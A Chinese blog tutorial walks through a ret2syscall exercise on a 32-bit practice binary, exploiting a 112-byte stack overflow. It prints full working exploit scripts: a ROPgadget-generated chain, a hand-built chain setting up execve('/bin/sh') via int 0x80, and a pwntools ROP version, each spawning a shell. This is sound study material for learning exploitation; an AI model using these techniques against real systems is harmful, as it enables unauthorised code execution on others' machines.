Pwn学习-ret2syscall

已于 2023-11-07 15:20:43 修改
阅读量82 收藏
点赞数
分类专栏: pwn 文章标签: 学习
于 2023-11-04 15:53:42 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cdl10000/article/details/134218330
版权

本内容主要是pwn入门学习,大佬勿喷!------漏洞栈溢出练习。

首先做一系列常规检查操作,不多说:

 计算偏移量,112,计算方法见Pwn学习-ret2text-CSDN博客

In [2]: 0xffffd51c-0xffffd4ac
Out[2]: 112

使用ROPgadget工具构造rop链 

ROPgadget --binary rop --ropchain >info.txt
#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = b''

p += pack('<I', 0x0806eb6a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb196) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0809a4ad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806eb6a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bb196) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0809a4ad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806eb6a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054590) # xor eax, eax ; ret
p += pack('<I', 0x0809a4ad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x0806eb91) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x0806eb6a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054590) # xor eax, eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x08049421) # int 0x80

构造最终exp:

#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack

# Padding goes here
p = b''

p += pack('<I', 0x0806eb6a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb196) # pop eax ; ret
p += b'/bin'
p += pack('<I', 0x0809a4ad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806eb6a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bb196) # pop eax ; ret
p += b'//sh'
p += pack('<I', 0x0809a4ad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806eb6a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054590) # xor eax, eax ; ret
p += pack('<I', 0x0809a4ad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x0806eb91) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x0806eb6a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054590) # xor eax, eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x0807b5bf) # inc eax ; ret
p += pack('<I', 0x08049421) # int 0x80

from pwn import *

s=process('./rop')
s.send(b'a'*0x70+p)
s.interactive()

上面的解法是自动的,不用太费脑子的解法。

下面介绍第二种解法,此处有坑,需要了解int 0x80知识点。Syscall的函数调用规范为:

execve("/bin/sh",NULL,NULL)//或者是execve(“/bin/sh”, 0,0);

对应的汇编代码为:

pop eax, # 系统调用号载入, execve为0xb,即 eax 应该为 0xb
pop ebx, # 第一个参数, /bin/sh的string,即 ebx 应该指向 /bin/sh 的地址,其实执行 sh 的地址也可以。
pop ecx, # 第二个参数,0,即 ecx 应该为 0
pop edx, # 第三个参数,0,即 edx 应该为 0
int 0x80, # 执行系统调用

我们在可以使用 ropgadgets 这个工具来寻找我们需要的 gadgets。我们一般使用--only 'pop|ret'来限定搜索开头是 pop 并且结尾是 retgadgets,同时| grep 'eax'是为了找对应 eax 寄存器的gadgets

首先,我们来寻找控制 eaxgadgets

root@Ubuntu20:/home/stack/ret2syscall# ROPgadget --binary rop  --only 'pop|ret' | grep 'eax'
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x080bb196 : pop eax ; ret
0x0807217a : pop eax ; ret 0x80e
0x0804f704 : pop eax ; ret 3
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret

这里我们选择0x080bb196,类似的我们可以得到控制其它寄存器的 gadgets:

root@Ubuntu20:/home/stack/ret2syscall# ROPgadget --binary rop  --only 'pop|ret' | grep 'ebx'
0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret
0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret
0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret
0x080be23f : pop ebx ; pop edi ; ret
0x0806eb69 : pop ebx ; pop edx ; ret
0x08092258 : pop ebx ; pop esi ; pop ebp ; ret
0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x10
0x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x14
0x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc
0x08048547 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4
0x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8
0x08048913 : pop ebx ; pop esi ; pop edi ; ret
0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 4
0x08049a94 : pop ebx ; pop esi ; ret
0x080481c9 : pop ebx ; ret
0x080d7d3c : pop ebx ; ret 0x6f9
0x08099c87 : pop ebx ; ret 8
0x0806eb91 : pop ecx ; pop ebx ; ret
0x0806336b : pop edi ; pop esi ; pop ebx ; ret
0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret
0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret
0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret
0x0805c820 : pop esi ; pop ebx ; ret
0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x0807b6ed : pop ss ; pop ebx ; ret

这里我们选0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret这个可以直接控制其它三个寄存器。

此外,我们需要获得 /bin/sh 字符串对应的地址

root@Ubuntu20:/home/stack/ret2syscall# ROPgadget --binary rop  --string '/bin/sh'
Strings information
============================================================
0x080be408 : /bin/sh

可以找到对应的地址,此外,还有 int 0x80 的地址,如下

root@Ubuntu20:/home/stack/ret2syscall# ROPgadget --binary rop  --only 'int'
Gadgets information
============================================================
0x08049421 : int 0x80

Unique gadgets found: 1

构造常规的EXP 如下:

#!/usr/bin/env python
from pwn import *

sh = process('./rop')

pop_eax_ret = 0x080bb196
pop_edx_ecx_ebx_ret = 0x0806eb90
int_0x80 = 0x08049421
binsh = 0x80be408
payload = flat(
    ['A' * 112, pop_eax_ret, 0xb, pop_edx_ecx_ebx_ret, 0, 0, binsh, int_0x80])
sh.sendline(payload)
sh.interactive()

其实 pwntools 给我们提供了一个很好用的用来布置 rop 的工具,参考文档:

https://pwntools-docs-zh.readthedocs.io/zh-cn/dev/rop/rop.html

代码如下:

from pwn import *
context.log_level = "debug"
#context.terminal = ['tmux', 'splitw', '-h']
context.kernel = 'i386'
elf = ELF('./rop')
rop = ROP(elf)
sh = process('./rop')
"""gdb.attach(sh, '''
    break main
''')"""

#int_0x80 = 0x0
int_0x80 = 0x08049421
rop.raw(b'A' * 112)
binsh = next(elf.search(b'/bin/sh')) #0x80be408
rop.eax = 0xb
rop.edx = 0x0
rop.ecx = 0x0
rop.ebx = binsh
rop.raw(0x08049421)
'''
rop.raw(b'A' * 112)
binsh = next(elf.search(b'/bin/sh'))
rop.execve(binsh, 0, 0)
'''
print(rop.dump())
raw_rop = rop.chain()
sh.send(raw_rop)
sh.recvline()
sh.interactive()

T1me1ntheSt0ry
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PWN】07.ret2syscall
weixin_52553215的博客
11-12 2321
Linux 在x86上的系统调用通过 int 80h 实现,用系统调用号来区分入口函数。在 /usr/include/x86_64-linux-gnu/asm/unistd_64.h 和/usr/include/x86_64-linux-gnu/asm/unistd_32.h 分别可以查看 64 位和 32 位的系统调用号。
[pwn]ROP:灵活运用syscall
Breeze的博客
08-26 9867
灵活运用syscall 遇到了一个程序并不复杂,但利用却很麻烦的题目,Recho题目详细writeup,题目地址:Recho 按照惯例,查看安全策略: 基本没啥安全策略,然后查看程序逻辑,程序很短,就一个main: 很容易就找到溢出点,大体逻辑就是,先输入一个数,小于15会被认为是16,然后再输入一串字符串,程序会将前x(刚输入的数字)个字符拷贝到buf中,这里没有上限,所以存在溢出。但问题是...
pwn学习笔记(3)ret2syscall
qq_66013948的博客
02-13 730
​ ROP(Return Oriented Programming)返回导向编程,主要思想是通过在程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而控制程序的执行流程。
pwn学习资料整理——syscall目录
recover517的博客
08-11 842
各种架构下的systemcell指令 x86 (32-bit) x86_64 (64-bit) arm (32-bit/EABI) arm64 (64-bit)
2018 10 12 pwn学习0x3 32位程序和64位程序的差别(两点),在Linux 寄存器调用函数syscall
startr4ck
10-12 1079
在64位程序当中和32的不一样的原因是  但是可以使用的内存地址不能大于0x00007fffffffffff,否则会抛出异常, 这就是为什么调试64位程序的时候,我们不能使用字符串进行的原因 x64中前六个参数依次保存在RDI, RSI, RDX, RCX, R8和 R9寄存器里 syscall调用 read  eax 0x3 ebx 0x3                     ecx re...
pwn入门(3):缓冲区溢出ROP攻击(ret2syscall+ret2libc)
Bossfrank的博客
04-18 1143
本节通过两个实例ret2tsyscall、ret2libc1,非常详细地为读者介绍基本的ROP攻击过程。对函数的调用、传参、返回的过程以及系统调用过程中对寄存器的赋值进行了详细阐释。
ROP链:ret2syscall
小龙在线
09-13 421
安全机制 ASLR(地址随机化) PIE(加强版ASLR) NX(数据段不可执行) ROP 系统调用 stack canary(栈溢出 写入校验值 ) stack smash 内存泄漏 RELRO got表 延迟绑定 plt 汇编代码 把真实地址放入got got 表单 跳转到libc.so 利用方法: 劫持eip,改为system plt 任意地址写got表,改为system真实地址,相当于调用call system(Got表劫持) 泄露,如泄露got表,里面有printf地址,进而计算出libc地址,
CTF-PWN-buuctf-others_shellcode-系统int80调用的使用方法
serfend's blog
04-24 1593
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1twNiCnqBL17_WuQr1NdGBQ?pwd=g9by 提取码:g9by 答案:flag{d07d7b41-1672-4338-a72c-43e12c26c587} 总体思路 这题是一道32位系统调用的教学题 [CTF pwn]傻傻分不清的execve、int80、syscall、system及shellcode 详细步骤 查看文件信息 in
中断INT 0x80的作用[转自csdn blog]
mty729的专栏
04-20 1586
<br />当进程执行系统调用时,先调用系统调用库中定义某个函数,该函数通常被展开成前面提到的_syscallN的形式通过INT 0x80来陷入核心,其参数也将被通过寄存器传往核心。 <br />在这一部分,我们将介绍INT 0x80的处理函数system_call。 <br />思考一下就会发现,在调用前和调用后执行态完全不相同:前者是在用户栈上执行用户态程序,后者在核心栈上执行核心态代码。那么,为了保证在核心内部执行完系统调用后能够返回调用点继续执行用户代码,必须在进入核心态时保存时往核心中压入一个上下
PWN-学习笔记
小龙在线
08-23 723
原理 危险函数:gets scanf pwndbg Python2 安装 pip install pwntools apt-get update apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential python3 -m pip install --upgrade pip python3 -m pip install --upgrade git+https://github.com
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
ctf-pwn的一些小技巧
钞sir的博客
11-09 5106
当我们在写exp的时候有些需要去复制粘贴某些函数在plt表,got表的地址,或者找ROP的地址,有些时候复制粘贴不方便且不方便阅读,这样时候我们就可以用pwntools中提供的一些函数; 以32位程序的exp为例: ROPgadget: 0x0804872f : pop ebp ; ret 0x0804872c : pop ebx ; pop esi ; pop edi ; pop ebp...
pwn 暑假复习二 简单rop
SsMing的博客
07-14 2059
例一:ret2shellcode 先复习一下计算与ebp的距离的方法,昨天复习的是用pattern来寻找,今天复习另一种,以ctfwiki的ret2text为例。先用ida打开查看源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvb...
pwn小白入门05---ret2syscall
weixin_45943522的博客
02-21 3377
ret2syscall ROP原理: 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢出的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。 gadget: 所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
显示recv调用次数_ctf中关于syscall系统调用的简单分析
weixin_39820136的博客
11-22 190
原创 紫色仰望 合天智汇 0x01我在动态调试这个程序的时候,发现 syscall调用 系统函数 的过程很有趣,于是便记录下来 希望对大家 能带来些帮助,这里 以 buu 平台上的 ciscn_2019_s_3 为例,给大家详细地分享以及分析下!0x02在开始之前,我们先来认真 学习下 read(),write()的 原型:read(): ssize_t read(int fd,const vo...
Linux系统调用(syscall)原理(转)
weixin_34245169的博客
03-13 1602
引言:分析Android源码的过程中,要想从上至下完全明白一行代码,往往涉及app、framework、native一直到kernel,可能迷失到代码世界,明白了系统调用原理,或许能帮你峰回路转,找到进入kernel函数的入口。本文主要讲解ARM架构相关源码: /bionic/libc/kernel/uapi/asm-arm/asm/unistd.h /bionic/libc/arch-ar...
hackme pwn rop2 [syscall + rop]
ACdream
02-05 512
先checksec一下: 有个大概思路:rop过NX main中和overflow函数里都有syscall函数,如下: 观察到这里有缓冲区溢出!"A" * 0xC! 先来学习syscall函数: syscall(int arg1, ……),为可变参数的函数,第一个参数为系统调用号,用以下命令查询: cat -n /usr/include/x86_64-linux-gnu/...
Pwn学习历程(1)--基本工具、交互、调试
热门推荐
Aka丶的博客
12-02 5万+
1、 从基础开始1.1 简单原理介绍以下内容摘自Wiki:   Pwn是一个骇客语法的俚语词,自”own”这个字引申出来的,这个词的含意在于,玩家在整个游戏对战中处在胜利的优势,或是说明竞争对手处在完全惨败的情形下,这个词习惯上在网络游戏文化主要用于嘲笑竞争对手在整个游戏对战中已经完全被击败(例如:”You just got pwned!”)。   在骇客行话里,尤其在另外一种电脑技术方面,包
ret2syscall原理详解
Sakura给爷pwn全场
10-27 324
ret2syscall原理详解与实例分析: https://www.freebuf.com/articles/system/234228.html
【GCC】结合GPT4 延迟梯度学习2:延迟梯度的计算及阈值更新
最新发布
突围
08-06 31
拥塞控制
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值